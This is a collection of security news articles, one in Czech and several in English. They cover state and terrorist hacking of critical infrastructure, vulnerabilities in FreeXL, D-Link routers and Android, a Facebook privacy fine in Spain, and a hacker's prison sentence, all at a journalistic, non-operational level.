Hackeři z řad radikálů se učí rychle
Kybernetickou složku IS založil v roce 2014 dvacetiletý Junaid Hussain známý jako hacker Trick, jenž vyrůstal v anglickém Birminghamu. Od té doby se hackeři IS nabourali do systému amerických zpravodajských stanic, kuvajtského parlamentu, webů francouzských obcí nebo stránek International Business Times a twitterového účtu Newsweeku.


Články na téma Islámský stát
Podle expertů sice zatím tito hackeři nejsou úplní profesionálové, to se ale může brzy změnit. „Rozhodně se učí s technologiemi. V příštích pěti letech budou zdatnější a budou se snažit uskutečňovat operace, jež by mohly mít katastrofické následky, jako jsou ztráty na životech,“ řekl Tech Insideru bývalý příslušník americké námořní pěchoty a šéf kybernetické konzultační firmy David Kennedy.
Problém představují zejména takzvaní osamělí vlci, kteří se radikální ideologií pouze inspirují, a nemusí být ani s teroristickou skupinou v kontaktu. „Pokud sedíte v internetové kavárně v Mogadišu, můžete způsobit na internetu mnohem větší škody, než byste udělali s AK-47 nebo bombou,“ upozornil odborník.


Masivní kybernetický útok ochromil počítače napříč planetou. V Česku necelé čtyři stovky
Hrozba většího kybernetického zásahu proto roste. V ohrožení jsou nejen vládní servery, ale i banky, elektrárny, rozvody vody či dopravní systémy. Hackeři by teoreticky mohli způsobit výbuch nebo potopu. Problémem jsou i zastaralé systémy, jež řídí konkrétně v USA řadu přehrad, továren, ale i ropovodů nebo elektrických distribučních soustav.

FAKTAKritická infrastruktura

Hackeři by například mohli „sdělit“ systému řízení přesunu ropy, že se tok černého zlata zastavil, což by způsobilo, že by automatické provozní systémy zahájily čerpání, dokud by nedošlo k výbuchu kvůli přetlakování.

Nabourat se do jaderné elektrárny není těžké, ukázal expert
Scott Lunsford z bezpečnostní divize IBM se již v roce 2007 úspěšně naboural do systému jaderné elektrárny. „Ukázalo se, že to bylo jedno z nejsnadnějších proniknutí, které jsem kdy provedl. Hned první den jsme pronikli do systému a během týdne jsme měli kompletní kontrolu nad celou jadernou elektrárnou,“ uvedl pirát.

Nebyl sice schopný přimět reaktor k explozi, čemuž brání fyzická bezpečnostní opatření, mohl ovšem elektrárně zabránit, aby zásobovalo okolí elektřinou. Hackeři by mohli způsobit rovněž hromadnou nehodu. Už roku 2010 prokázali výzkumníci z University of Washington, že piráti mohou převzít kontrolu nad klíčovými systémy automobilu.

Americký prezident Donald Trump podepsal v květnu dekret, kterým vydal pokyn posílit a modernizovat americkou počítačovou síť, podle odborníků to ale není dost.


Hackerské útoky jsou častější a sofistikovanější, experti cvičí obranu
„Je zde krátkodobé okno, příležitost, než přijde rozhodující moment, útok o rozsahu atentátů z 11. září. Přišla doba činu. Jako národ musíme znát výzvy v oblasti kybernetické bezpečnosti a začít přijímat smysluplné kroky k jejímu zlepšení, abychom zabránili rozsáhlému kybernetickému útoku,“ uvádí v nejnovější zprávě Národní rada pro infrastrukturu (NIAC), která představila jedenáct doporučení, jež mají vést ke zlepšení situace.
Zpráva poradní skupiny NIAC o kybernetických hrozbách pro kritickou infrastrukturu 1.65 MB
Problém představuje například fakt, že v USA vlastní a provozuje většinu kritické infrastruktury soukromý sektor, k němuž se nedostanou z vládních míst všechny citlivé informace o případné hrozbě.

Poradní orgán NIAC proto vyzývá průmyslové firmy, aby vytvořily automatizovaný mechanismus sdílení informací. Vláda by pak podle odborníků měla urychlit udělování bezpečnostních prověrek vedoucím pracovníkům a odtajnit informace o kybernetických hrozbách.


Co všechno se dá hacknout? Od kardiostimulátoru až po jadernou elektrárnu
Spojené státy by dle poradců měly vytvořit samostatné komunikační sítě pro podporu kritické infrastruktury, které by byly odděleny od veřejného internetu. Vzniknout by měla bezdrátová záložní síť pro nouzovou komunikaci v případě celoplošného kybernetického útoku.


KLDR zřejmě poprvé pronikla i k tajným vojenským dokumentům Jižní Koreje
Na kybernetickou bezpečnost by měl dohlížet přímo poradce Bílého domu pro národní bezpečnost, míní experti.
Ti jsou rovněž přesvědčeni o tom, že by federální agentury měly poskytnout obzvlášť středním a menším firmám podporu technologického i finančního rázu, pokud jde o ochranu před útoky. Stát by měl odsouhlasit pobídky, jež by umožnily firmám více investovat do ochranných technologií.

FAKTAAmerická Národní rada pro infrastrukturu (NIAC)

Hackerský útok by mohl ochromit letový provoz
Že další 11. září může být způsobené spíše piráty, kteří ovládnou letecké systémy, než sebevražednými atentátníky s bombami, varoval už před dvěma lety ředitel programu pro kybernetickou bezpečnost z izraelského Institutu studií národní bezpečnosti Gabi Siboni.

„Hackeři začali cílit na jaderné elektrárny a další kritické operace po celém světě v trvalém úsilí o převzetí kontroly,“ uvedl odborník.

V nejhorším případě by teroristické skupiny mohly narušit a případně proniknout do kritické infrastruktury kontroly vzdušného prostoru, což by zastavilo letové systémy a způsobilo smrtící nehody.

„Kybernetická agrese je široce využívána a stala se základní zbraní používanou v mezinárodních konfliktech. Za útoky na většinu národní infrastruktury jsou zodpovědné země a vlády západního světa chápou, že musí vyčlenit prostředky nejen na nákup nových tanků a systémů vzdušné obrany, ale také pokud jde o obrannou kybernetickou infrastrukturu.“
Gabi Siboni
izraelský odborník na kybernetickou bezpečnost
Kyberválka už zuří mezi státy
Kybernetických útoků přibývá, přičemž mnohdy je více či méně dokázáno, že se na nich podílely režimy jednotlivých zemí. Vyšlo kupříkladu najevo, že íránští hackeři ovládli v roce 2013 šest metrů vysokou hráz nedaleko New Yorku. K odpovědnosti se o dva roky později přihlásila íránská skupina SOBH Cyber Jihad.

Horizont: Americká infrastruktura čelí neustálým útokům hackerů
Hackeři operující ve prospěch cizího státu také nedávno pronikli do nejméně dvanácti amerických elektráren, včetně kansaské jaderné elektrárny Wolf Creek, uvedla agentura Bloomberg s odvoláním na informované americké činitele.

Útok podle nich vyvolává podezření, že hackeři hledají slabá místa v rozvodu elektrické energie. Hlavním podezřelým je v tomto případě Rusko.

Loni v prosinci měl na svědomí výpadek elektrické energie v ukrajinské metropoli Kyjevě škodlivý program nazvaný Win32/Industroyer. Pozměněné formy tohoto malwaru by podle odborníků dokázaly zaútočit i na jinou infrastrukturu. Ukrajina z útoků na své energetické sítě obvinila právě Rusko, které ale vinu odmítlo.


Počítačový virus umí vyřadit rozsáhlou elektrickou síť, tvrdí analýzy
Počítače využívá jako zbraň i Washington. Třeba zásah proti íránskému jadernému zařízení Natanz ale nikdy oficiálně nepotvrdil. Virus Stuxnet podle některých expertů tamní jaderný program mezi lety 2009 a 2010 zpomalil.


Vzpruha pro popírače zásahů Moskvy? Hackeři CIA se prý umí maskovat za Rusy
Červ dokázal přeprogramovat automatizované systémy a vyřadil tak z provozu tisícovku íránských centrifug na obohacování uranu.
V roce 2014 se pro změnu severokorejští hackeři nabourali do útrob společnosti Sony, a to nejspíš díky ukradeným heslům administrátora. Bílý dům tehdy označil útok za národně bezpečnostní hrozbu. Sony se nakonec rozhodla filmovou parodii pojednávající o atentátu na hlavu komunistické KLDR nepředat do distribuce.

Zranitelnost systému ukázaly i úniky z ústředí Demokratické strany před prezidentskými volbami v USA. Americké tajné služby tvrdí, že kampaň, jež měla pošpinit Hillary Clinotovou a pomoci Trumpovi, nařídil Kreml.


Tajné služby: Kampaň, která měla ovlivnit prezidentské volby v USA, nařídil Putin
Ruská vojenská rozvědka (GRU) prý poskytla serveru WikiLeaks materiály, které získala hackerským útokem na demokratické politiky. Moskva vinu popřela.

Stejně přitom reagovala i v červnu, kdy z uniklé zprávy Národní bezpečnostní agentury (NSA) vyplynulo, že ruští hackeři napadli několik dní před volbami server nejméně jednoho dodavatele amerického hlasovacího softwaru.


High Severity Flaws Patched in FreeXL Library

11.9.2017 securityweek  Vulnerebility
An update released last week for the FreeXL library patches a couple of high severity remote code execution vulnerabilities discovered by Marcin Noga, a Polish researcher working for Cisco Talos.

FreeXL is an open source C-based library that allows users to extract data from Microsoft Excel (.xls) spreadsheets. A FreeXL package is available for several Linux distributions.

Noga noticed that the read_biff_next_record and read_legacy_biff functions in FreeXL, which are related to the Binary Interchange File Format (BIFF), are affected by heap-based buffer overflow vulnerabilities. An attacker can exploit the flaws by getting the targeted user to open a specially crafted Excel file via an application that uses the FreeXL library.

“An attacker who sends a malicious XLS file, can use this to overwrite large parts of memory to crash the application or to execute arbitrary code by overwriting critical control flow structures,” Cisco said in a blog post.

The flaws, tracked as CVE-2017-2923 and CVE-2017-2924, have been assigned a CVSS score of 8.8, which puts them in the high severity category. Cisco Talos has published technical advisories for both security holes.

The vulnerabilities were patched by FreeXL developers on September 7 with the release of version 1.0.4.

“Developers, system packagers and maintainers are warmly invited to quickly upgrade to FreeXL-1.0.4,” said FreeXL maintainer and developer Alessandro Furieri.

FreeXL vulnerabilities are uncommon, but not unheard of. Back in March 2015, a researcher discovered several flaws that could have been exploited for arbitrary code execution or denial-of-service (DoS) attacks by getting the targeted user to open a specially crafted file.


Facebook slapped with $1.43 million fine for violating users' privacy in Spain

11.9.2017 thehackernews Social

Facebook is once again in trouble regarding its users' privacy.
The social media giant has recently been heavily fined once again for a series of privacy violations in Spain.
Recently, Google also incurred a record-breaking fine of $2.7 billion (€2.42 billion) by the European antitrust officials for unfairly manipulating search results since at least 2008.
Now, the Spanish Data Protection Agency (AEPD) has issued a €1.2 Million (nearly $1.4 Million) fine against Facebook for breaching laws designed to protect its people's information and confidentiality.
According to the data protection watchdog, the social network collects its users' personal data without their 'unequivocal consent' and makes the profit by sharing the data with advertisers and marketers.
The AEPD also found Facebook collects sensitive data on user's ideology, religious beliefs, sex and personal tastes and navigation—either directly from its own services or through third parties—without clearly informing its users how this information would be used.
This activity constituted a "very serious" infringement of the country's local data protection law (LOPD), for which the authority fined the company €600,000 ($718,062).
The regulator also identified two "serious" violations of privacy laws, including:
Tracking people through the use of "Like" button social plug-ins embedded in other non-Facebook web pages—for which it is fined €300,000 ($359,049).
Failing to delete data collected from users once it has finished using it, in fact, the company "retains and reuses it later associated with the same user"—which resulted in another €300,000 ($359,049) fines.
The AEPD also said that Facebook's existing privacy policy contains "generic and unclear terms," and doesn't "adequately collect the consent of either its users or nonusers, which constitutes a serious infringement."
However, Facebook denied any wrongdoing and intended to appeal the decision of the Spanish data protection authority, providing the following statement.
"We take note of the DPA's decision with which we respectfully disagree. Whilst we value the opportunities we've had to engage with the DPA to reinforce how seriously we take the privacy of people who use Facebook, we intend to appeal this decision."
"As we made clear to the DPA, users choose which information they want to add to their profile and share with others, such as their religion. However, we do not use this information to target adverts to people."
In May, the social media giant was fined €150,000 ($179,532) by for the way Facebook targeted advertising and tracked users.


Researcher Discloses 10 Zero-Day Flaws in D-Link 850L Wireless Routers

11.9.2017 thehackernews Vulnerebility

A security researcher has discovered not one or two but a total of ten critical zero-day vulnerabilities in routers from Taiwan-based networking equipment manufacturer D-Link which leave users open to cyber attacks.
D-Link DIR 850L wireless AC1200 dual-band gigabit cloud routers are vulnerable to 10 security issues, including "several trivial" cross-site scripting (XSS) flaws, lack of proper firmware protection, backdoor access, and command injection attacks resulting in root access.
If successfully exploited, these vulnerabilities could allow hackers to intercept connection, upload malicious firmware, and get root privileges, enabling them to remotely hijack and control affected routers, as well as network, leaving all connected devices vulnerable to cyber attacks as well.
These zero-day vulnerabilities were discovered by Pierre Kim—the same security researcher who last year discovered and reported multiple severe flaws in D-Link DWR-932B LTE router, but the company ignored the issues.
The same happened in February, when the researcher reported nine security flaws in D-Link products but disclosed the vulnerabilities citing a "very badly coordinated" disclosure with D-Link.
So, Kim opted to publicly disclose the details of these zero-day flaws this time and published their details without giving the Taiwan-based networking equipment maker the chance to fix them.
Here's the list of 10 zero-day vulnerabilities affect both D-Link 850L revision A and revision B Kim discovered:
Lack of proper firmware protection—since the protection of the firmware images is non-existent, an attacker could upload a new, malicious firmware version to the router. Firmware for D-Link 850L RevA has no protection at all, while firmware for D-Link 850L RevB is protected but with a hardcoded password.
Cross-site scripting (XSS) Flaws—both LAN and WAN of D-Link 850L RevA is vulnerable to "several trivial" XSS vulnerability, allowing an attacker "to use the XSS to target an authenticated user in order to steal the authentication cookies."
Retrieve admin passwords—both LAN and WAN of D-Link 850L RevB are also vulnerable, allowing an attacker to retrieve the admin password and use the MyDLink cloud protocol to add the user's router to the attacker's account to gain full access to the router.
Weak cloud protocol—this issue affects both D-Link 850L RevA and RevB. MyDLink protocol works via a TCP tunnel that use no encryption at all to protect communications between the victim's router and the MyDLink account.
Backdoor Access—D-Link 850L RevB routers have backdoor access via Alphanetworks, allowing an attacker to get a root shell on the router.
Private keys hardcoded in the firmware—the private encryption keys are hardcoded in the firmware of both D-Link 850L RevA and RevB, allowing to extract them to perform man-in-the-middle (MitM) attacks.
No authentication check—this allows attackers to alter the DNS settings of a D-Link 850L RevA router via non-authenticated HTTP requests, forward the traffic to their servers, and take control of the router.
Weak files permission and credentials stored in cleartext—local files are exposed in both D-Link 850L RevA and RevB. In addition, routers store credentials in clear text.
Pre-Authentication RCEs as root—the internal DHCP client running on D-Link 850L RevB routers is vulnerable to several command injection attacks, allowing attackers to gain root access on the affected devices.
Denial of Service (DoS) bugs—allow attackers to crash some daemons running in both D-Link 850L RevA and RevB remotely via LAN.
Kim advised users to cut the connections with the affected D-Link router in order to be safe from such attacks.
According to Kim, "the Dlink 850L is a router overall badly designed with a lot of vulnerabilities. Basically, everything was pwned, from the LAN to the WAN. Even the custom MyDlink cloud protocol was abused."
You can get full details of all 10 zero-day vulnerabilities on Kim's website as well as on security mailing lists.
The security of D-Link products has recently been questioned when the U.S. Federal Trade Commission, FTC sued the company earlier this year, alleging that the lax security left its products and therefore, "thousands of consumers" vulnerable to hackers.


"Toast" Vulnerability in Android Allowed for New Overlay Attacks

11.9.2017 securityweek Vulnerebility
One of the 81 vulnerabilities addressed in the September 2017 Android security bulletin was a High risk issue that could be exploited to launch a new type of overlay attacks, Palo Alto Networks reveals.

Tracked as CVE-2017-0752 and described as an elevation of privilege vulnerability in the Android framework (windowmanager), the bug abuses the “Toast” notifications in the operating system to modify what users see on the screen. Unlike similar overlay attacks, however, the new method does not require specific permissions or conditions to be effective, Palo Alto's security researchers have discovered.

All Android releases prior to Android 8.0 Oreo are at risk, but Palo Alto’s researchers say they are not aware of any active attacks against this particular vulnerability. To stay protected, users are advised to update their devices as soon as a patch becomes available for them.

“This type of attack can be used to give malicious software total control over the device. In a worst-case attack scenario, this vulnerability could be used to render the phone unusable or to install any kind of malware including (but not limited to) ransomware or information stealers,” the researchers note.

The attack works similarly to other overlay exploits, by drawing a window over other windows and applications running on the device. Thus, an attacker can trick the victim into believing they are clicking on a window, but in reality they are clicking on another, where malware is installed or unwanted permissions (such as full device privileges) are granted.

While overlay attacks aren’t new and have been discussed before, it was a common misconception that malicious apps attempting such trickery would need to explicitly request the “draw on top” permission and would need to be installed from Google Play, Palo Alto says. The newly discovered vulnerability can be exploited without meeting these conditions, thus rendering overlay attacks a more serious threat than believed.

For that, an application would have to abuse the “Toast” window, an overlay type normally used to display a quick message (notification) over all other apps. The Toast window would allow a malicious application to write over the interface of another app without requesting the SYSTEM_ALERT_WINDOW privilege this typically requires.

An installed app that can craft an overlay using the Toast window can launch an attack without special permissions. The crafted overlay includes two types of views (normally embedded in a Toast window), one of which is clickable. If the attacker can lure the user into clicking the view, the attack is successful, the researchers point out.

What’s more, the permission check and operation check don’t apply to Toast windows either, meaning that an app is granted complete control over TYPE_TOAST window. While Android 7.1 introduces mitigations by assigning a maximum timeout (3.5s) for each Toast window and not allowing apps to display more than one such window at a time, the fundamental cause of the vulnerability isn’t addressed, and an app still doesn’t need permissions to display a Toast window on top of other apps.

The security researchers also discovered that it is possible to continuously show a Toast window despite said mitigations, although the approach doesn’t allow the malicious app to monitor whether the user has clicked on the expected area in the overlay. Another approach would involve displaying an overlay to lure users to click on it, sleep for several seconds, and switch to another overlay.

The vulnerability was reported in May 2017 and Google included patches for it in the September 2017 Android security bulletin. Android 8.0 Oreo doesn’t inherit the vulnerability and all devices running this platform iteration are safe from overlay attacks, the security researchers say.


Man Sentenced to Prison for Hacking Accounts of U.S. Officials

11.9.2017 securityweek Crime
Justin G. Liverman, a 25-year-old from Morehead City, North Carolina, has been sentenced to prison for his role in a hacking conspiracy that targeted the online accounts of U.S. officials and their families.

Liverman, known online as “D3F4ULT,” admitted being a member of the Crackas With Attitude hacker group. In January, he pleaded guilty to conspiracy to commit unauthorized computer intrusions, identity theft, and phone harassment.

He was sentenced on Friday by a court in the Eastern District of Virginia to 5 years in prison. Another member of Crackas With Attitude, 23-year-old Andrew Otto Bogs, also of North Carolina, was sentenced to 2 years in prison in June for his role in the conspiracy.

Three other individuals believed to be members of the hacker group, including a 17-year-old boy, are from the United Kingdom and they are being prosecuted by local authorities.

Between October 2015 and February 2016, Crackas With Attitude used social engineering and other techniques to gain access to government systems, and the accounts of U.S. officials and their families. The group’s victims included CIA director John Brennan, U.S. spy chief James Clapper, and senior figures in the FBI, the DHS, the White House and other federal agencies.

The hackers leaked the victims’ personal details and harassed them over the phone. Liverman published documents and personal information obtained from one victim’s account, sent them threatening text messages, and used a “phonebombing” service that repeatedly called the victim with a threatening message.